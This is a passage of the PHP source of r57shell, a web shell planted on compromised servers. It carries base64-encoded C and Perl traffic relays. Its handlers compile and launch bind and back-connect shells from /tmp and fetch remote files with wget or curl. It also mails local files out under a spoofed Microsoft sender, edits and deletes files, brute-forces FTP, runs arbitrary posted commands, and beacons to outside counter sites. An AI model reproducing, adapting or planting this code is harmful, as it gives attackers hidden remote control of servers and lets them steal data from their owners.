LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c 29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci 5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm lsZSk7DQogIHJldHVybiAwOw0KfQ=='; $datapipe_pl='IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2 xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9 yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J 1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo='; $c1 = 'PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L 3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=='; $c2 = 'PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u 8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV ybmV0LS0+'; echo $head; echo ''; if(empty($_POST['cmd'])) { $serv = array(127,192,172,10); $addr=@explode('.', $_SERVER['SERVER_ADDR']); $current_version = str_replace('.','',$version); if (!in_array($addr[0], $serv)) { @print ''; @readfile ('http://127.0.0.1/r57shell/version.php?version='.$current_version.'');}} echo '
'.ws(1).'  !'.ws(2).'r57shell '.$version.' '; echo ws(2); echo ''.date ('d-m-Y H:i:s').''; echo ws(2).$lb.' phpinfo '.$rb; echo ws(2).$lb.' php.ini '.$rb; echo ws(2).$lb.' cpu '.$rb; echo ws(2).$lb.' mem '.$rb; if($unix) { echo ws(2).$lb.' users '.$rb; } echo ws(2).$lb.' tmp '.$rb; echo ws(2).$lb.' delete '.$rb.'
'; echo ws(2); echo (($safe_mode)?('safe_mode: ON'):('safe_mode: OFF')); echo ws(2); echo 'PHP version: '.@phpversion().''; $curl_on = @function_exists('curl_version'); echo ws(2); echo 'cURL: '.(($curl_on)?('ON'):('OFF')); echo ws(2); echo 'MySQL: '; $mysql_on = @function_exists('mysql_connect'); if($mysql_on){ echo 'ON'; } else { echo 'OFF'; } echo ws(2); echo 'MSSQL: '; $mssql_on = @function_exists('mssql_connect'); if($mssql_on){echo 'ON';}else{echo 'OFF';} echo ws(2); echo 'PostgreSQL: '; $pg_on = @function_exists('pg_connect'); if($pg_on){echo 'ON';}else{echo 'OFF';} echo ws(2); echo 'Oracle: '; $ora_on = @function_exists('ocilogon'); if($ora_on){echo 'ON';}else{echo 'OFF';} echo '
'.ws(2); echo 'Disable functions : '; if(''==($df=@ini_get('disable_functions'))){echo 'NONE';}else{echo '$df';} $free = @diskfreespace($dir); if (!$free) {$free = 0;} $all = @disk_total_space($dir); if (!$all) {$all = 0;} $used = $all-$free; $used_percent = @round(100/($all/$free),2); echo '
'.ws(2).'HDD Free : '.view_size($free).' HDD Total : '.view_size($all).''; echo '
'; echo $font; if(!$windows){ echo 'uname -a :'.ws(1).'
sysctl :'.ws(1).'
$OSTYPE :'.ws(1).'
Server :'.ws(1).'
id :'.ws(1).'
pwd :'.ws(1).'

'; echo '
'; echo ''; $uname = ex('uname -a'); echo((!empty($uname))?(ws(3).@substr($uname,0,120).'
'):(ws(3).@substr(@php_uname(),0,120).'
')); if(!$safe_mode){ $bsd1 = ex('sysctl -n kern.ostype'); $bsd2 = ex('sysctl -n kern.osrelease'); $lin1 = ex('sysctl -n kernel.ostype'); $lin2 = ex('sysctl -n kernel.osrelease'); } if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = '$bsd1 $bsd2'; } else if (!empty($lin1)&&!empty($lin2)) {$sysctl = '$lin1 $lin2'; } else { $sysctl = '-'; } echo ws(3).$sysctl.'
'; echo ws(3).ex('echo $OSTYPE').'
'; echo ws(3).@substr($SERVER_SOFTWARE,0,120).'
'; $id = ex('id'); echo((!empty($id))?(ws(3).$id.'
'):(ws(3).'user='.@get_current_user().' uid='.@getmyuid().' gid='.@getmygid().'
')); echo ws(3).$dir; echo ws(3).'( '.perms(@fileperms($dir)).' )'; echo '
'; } else { echo 'OS :'.ws(1).'
Server :'.ws(1).'
User :'.ws(1).'
pwd :'.ws(1).'

'; echo '
'; echo ''; echo ws(3).@substr(@php_uname(),0,120).'
'; echo ws(3).@substr($SERVER_SOFTWARE,0,120).'
'; echo ws(3).@get_current_user().'
'; echo ws(3).$dir; echo '
'; } echo ''; echo '
'; if(empty($c1)||empty($c2)) { die(); } $f = '
'; $f .= base64_decode($c1); $f .= base64_decode($c2); if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=='mail') { $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],'From: '.$POST['from'].'\r\n'); mr($language,$res); $_POST['cmd']=''; } if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=='mail_file' && !empty($_POST['loc_file'])) { if(!$file=@fopen($_POST['loc_file'],'r')) { echo re($_POST['loc_file']); $_POST['cmd']=''; } else { $filename = @basename($_POST['loc_file']); $filedump = @fread($file,@filesize($_POST['loc_file'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); $attach = array( 'name'=>$filename, 'type'=>$mime_type, 'content'=>$filedump ); if(empty($_POST['subj'])) { $_POST['subj'] = 'file from r57shell'; } if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach); mr($language,$res); $_POST['cmd']=''; } } if(!empty($_POST['cmd']) && $_POST['cmd'] == 'find_text') { $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; } if(!empty($_POST['cmd']) && $_POST['cmd']=='ch_') { switch($_POST['what']) { case 'own': @chown($_POST['param1'],$_POST['param2']); break; case 'grp': @chgrp($_POST['param1'],$_POST['param2']); break; case 'mod': @chmod($_POST['param1'],intval($_POST['param2'], 8)); break; } $_POST['cmd']=''; } if(!empty($_POST['cmd']) && $_POST['cmd']=='mk') { switch($_POST['what']) { case 'file': if($_POST['action'] == 'create') { if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],'w')) { echo ce($_POST['mk_name']); $_POST['cmd']=''; } else { fclose($file); $_POST['e_name'] = $_POST['mk_name']; $_POST['cmd']='edit_file'; echo '
'.$lang[$language.'_text61'].'
'; } } else if($_POST['action'] == 'delete') { if(unlink($_POST['mk_name'])) echo '
'.$lang[$language.'_text63'].'
'; $_POST['cmd']=''; } break; case 'dir': if($_POST['action'] == 'create'){ if(mkdir($_POST['mk_name'])) { $_POST['cmd']=''; echo '
'.$lang[$language.'_text62'].'
'; } else { echo ce($_POST['mk_name']); $_POST['cmd']=''; } } else if($_POST['action'] == 'delete'){ if(rmdir($_POST['mk_name'])) echo '
'.$lang[$language.'_text64'].'
'; $_POST['cmd']=''; } break; } } if(!empty($_POST['cmd']) && $_POST['cmd']=='edit_file' && !empty($_POST['e_name'])) { if(!$file=@fopen($_POST['e_name'],'r+')) { $only_read = 1; @fclose($file); } if(!$file=@fopen($_POST['e_name'],'r')) { echo re($_POST['e_name']); $_POST['cmd']=''; } else { echo $table_up3; echo $font; echo '
'; echo ws(3).''.$_POST['e_name'].''; echo '
'; echo ''; echo ''; echo ''; echo (!empty($only_read)?('

'.$lang[$language.'_text44']):('

')); echo '
'; echo '
'; echo '
'; echo ''; exit(); } } if(!empty($_POST['cmd']) && $_POST['cmd']=='save_file') { if(!$file=@fopen($_POST['e_name'],'w')) { echo we($_POST['e_name']); } else { @fwrite($file,$_POST['e_text']); @fclose($file); $_POST['cmd']=''; echo '
'.$lang[$language.'_text45'].'
'; } } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=='C')) { cf('/tmp/bd.c',$port_bind_bd_c); $blah = ex('gcc -o /tmp/bd /tmp/bd.c'); @unlink('/tmp/bd.c'); $blah = ex('/tmp/bd '.$_POST['port'].' '.$_POST['bind_pass'].' &'); $_POST['cmd']='ps -aux | grep bd'; } if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=='Perl')) { cf('/tmp/bdpl',$port_bind_bd_pl); $p2=which('perl'); if(empty($p2)) $p2='perl'; $blah = ex($p2.' /tmp/bdpl '.$_POST['port'].' &'); $_POST['cmd']='ps -aux | grep bdpl'; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=='Perl')) { cf('/tmp/back',$back_connect); $p2=which('perl'); if(empty($p2)) $p2='perl'; $blah = ex($p2.' /tmp/back '.$_POST['ip'].' '.$_POST['port'].' &'); $_POST['cmd']='echo \'Now script try connect to '.$_POST['ip'].' port '.$_POST['port'].' ...\''; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=='C')) { cf('/tmp/back.c',$back_connect_c); $blah = ex('gcc -o /tmp/backc /tmp/back.c'); @unlink('/tmp/back.c'); $blah = ex('/tmp/backc '.$_POST['ip'].' '.$_POST['port'].' &'); $_POST['cmd']='echo \'Now script try connect to '.$_POST['ip'].' port '.$_POST['port'].' ...\''; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=='Perl')) { cf('/tmp/dp',$datapipe_pl); $p2=which('perl'); if(empty($p2)) $p2='perl'; $blah = ex($p2.' /tmp/dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &'); $_POST['cmd']='ps -aux | grep dp'; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=='C')) { cf('/tmp/dpc.c',$datapipe_c); $blah = ex('gcc -o /tmp/dpc /tmp/dpc.c'); @unlink('/tmp/dpc.c'); $blah = ex('/tmp/dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &'); $_POST['cmd']='ps -aux | grep dpc'; } if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} if (!empty($HTTP_POST_FILES['userfile']['name'])) { if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } else { $nfn = $HTTP_POST_FILES['userfile']['name']; } @copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['dir'].'/'.$nfn) or print('
Error uploading file '.$HTTP_POST_FILES['userfile']['name'].'
'); } if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) { switch($_POST['with']) { case wget: $_POST['cmd'] = which('wget').' '.$_POST['rem_file'].' -O '.$_POST['loc_file'].''; break; case fetch: $_POST['cmd'] = which('fetch').' -o '.$_POST['loc_file'].' -p '.$_POST['rem_file'].''; break; case lynx: $_POST['cmd'] = which('lynx').' -source '.$_POST['rem_file'].' > '.$_POST['loc_file'].''; break; case links: $_POST['cmd'] = which('links').' -source '.$_POST['rem_file'].' > '.$_POST['loc_file'].''; break; case GET: $_POST['cmd'] = which('GET').' '.$_POST['rem_file'].' > '.$_POST['loc_file'].''; break; case curl: $_POST['cmd'] = which('curl').' '.$_POST['rem_file'].' -o '.$_POST['loc_file'].''; break; } } if(!empty($_POST['cmd']) && ($_POST['cmd']=='ftp_file_up' || $_POST['cmd']=='ftp_file_down')) { list($ftp_server,$ftp_port) = split(':',$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); } else { if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { fe($language,1); } else { if($_POST['cmd']=='ftp_file_down') { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.(($windows)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); } if($_POST['cmd']=='ftp_file_up') { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); } } } @ftp_close($connection); $_POST['cmd'] = ''; } if(!empty($_POST['cmd']) && $_POST['cmd']=='ftp_brute') { list($ftp_server,$ftp_port) = split(':',$_POST['ftp_server_port']); if(empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect ($ftp_server,$ftp_port,10); if(!$connection) { fe($language,0); $_POST['cmd'] = ''; } else if(!$users=get_users()) { echo '
'.$lang[$language.'_text96'].'
'; $_POST['cmd'] = ''; } @ftp_close($connection); } echo $table_up3; if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?('dir'):('ls -lia'); } else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']='safe_dir'; } echo $font.$lang[$language.'_text1'].': '.$_POST['cmd'].'
'; echo '
'; echo ''; echo ''; function up_down($id) { global $lang; global $language; return ' '; } function div($id) { if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '
'; return '
'; } if(!$safe_mode){ echo $fs.$table_up1.$lang[$language.'_text2'].up_down('id1').$table_up2.div('id1').$ts; echo sr(15,''.$lang[$language.'_text3'].$arrow.'',in('text','cmd',85,'')); echo sr(15,''.$lang[$language.'_text4'].$arrow.'',in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.'
'.$table_end1.$fe; } else{ echo $fs.$table_up1.$lang[$language.'_text28'].up_down('id2').$table_up2.div('id2').$ts; echo sr(15,''.$lang[$language.'_text4'].$arrow.'',in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); echo $te.'
'.$table_end1.$fe; } echo $fs.$table_up1.$lang[$language.'_text42'].up_down('id3').$table_up2.div('id3').$ts; echo sr(15,''.$lang[$language.'_text43'].$arrow.'',in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11'])); echo $te.''.$table_end1.$fe; if($safe_mode){ echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts; echo sr(15,''.$lang[$language.'_text58'].$arrow.'',in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):('new_name'))).ws(4).''.ws(3).''.in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13'])); echo $te.''.$table_end1.$fe; } if($safe_mode && $unix){ echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts; echo sr(15,''.$lang[$language.'_text68'].$arrow.'',''.ws(2).''.$lang[$language.'_text69'].$arrow.''.ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):('filename'))).ws(2).''.$lang[$language.'_text70'].$arrow.''.ws(2).in('text','param2 title=''.$lang[$language.'_text71'].''',26,(($_POST['param2'])?($_POST['param2']):('0777'))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); echo $te.''.$table_end1.$fe; } if(!$safe_mode){ foreach ($aliases as 